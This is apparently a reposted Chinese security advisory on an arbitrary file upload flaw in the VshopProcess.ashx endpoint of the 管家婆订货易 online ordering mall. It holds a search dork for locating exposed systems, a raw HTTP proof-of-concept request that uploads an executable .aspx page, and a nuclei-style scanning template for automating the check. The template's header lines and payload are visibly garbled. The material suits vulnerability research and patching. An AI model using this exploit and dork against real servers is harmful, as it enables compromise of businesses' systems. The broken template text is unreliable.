Vulnerability description
管家婆订货易在线商城VshopProcess.ashx接口处存在任意文件上传漏洞,恶意攻击者可能利用此漏洞上传恶意文件最终导致服务器失陷。
Loophole recurrence
步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~
# 搜索语法
title="订货易"||title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3"
步骤二:以下为POC数据包上传PHP代码文件后获取上传地址...
POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/57.0.578.100 Safari/537.36
Accept-Encoding: gzip
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5
------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="fileup1i"; filename="ceshi.aspx"
Content-Type: image/jpeg
<%@ Page Language="C#" %>
<%
Response.Write("Hello World!");
System.IO.File.Delete(Request.ServerVariables["PATH_TRANSLATED"]);
%>
------WebKitFormBoundarytCOFhbEjc3IfYaY5--
步骤三:访问上传地址页面 有上传文件内容....
http://IP/Storage/UserFileImg/52ee2f09-1a97-49b8-b73e-8c708a45a8e7.aspx
batch script
id: GJP-VshopProcess-uploadfile
info:
name: 管家婆订货易在线商城VshopProcess.ashx接口处存在任意文件上传漏洞,恶意攻击者可能利用此漏洞上传恶意文件最终导致服务器失陷。
author: LY
severity: high
metadata:
title="订货易"||title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3" :
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
raw:
|
POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/57.0.578.100 Safari/537.36 :
gzip :
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5 :
------WebKitFormBoundarytCOFhbEjc3IfYaY5
form-data; name="fileup1i"; filename="{{filename}}.aspx" :
image/jpeg :
Page Language="C#" %>
World!");
System.IO.File.Delete(Request.ServerVariables["PATH_TRANSLATED"]);
%>
------WebKitFormBoundarytCOFhbEjc3IfYaY5--
|
GET {{path}} HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 :
extractors:
type: regex
name: path
part: body
regex:
'.*'
internal: true
matchers:
type: dsl
dsl:
status_code==200 && contains_all(body,"Hello World!")
原文始发于微信公众号(揽月安全团队):管家婆订货易在线商城 VshopProcess 任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论